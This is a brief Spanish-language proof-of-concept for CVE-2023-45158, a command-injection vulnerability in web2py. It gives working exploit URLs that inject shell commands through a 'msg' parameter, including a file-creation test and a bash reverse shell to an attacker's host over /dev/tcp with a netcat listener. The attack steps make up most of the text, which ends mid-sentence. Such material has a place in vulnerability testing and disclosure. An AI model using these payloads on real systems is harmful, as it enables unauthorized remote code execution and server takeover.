
Prueba de concepto de exploit para CVE-2023-45158, una vulnerabilidad de inyección de comandos en web2py. Demuestra la ejecución remota de código mediante solicitudes HTTP manipuladas, incluyendo la creación de archivos y payloads de shell inversa.
cd web2py
python3 web2py.py
http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. Reemplaza <IP-ADDRESS> y <YOUR-COMMAND> con tus valores.http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27
En la máquina del atacante, ejecuta nc -l 127.0.0.1 8080
Ve a la URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Reemplaza .
<ATTACKER-IP>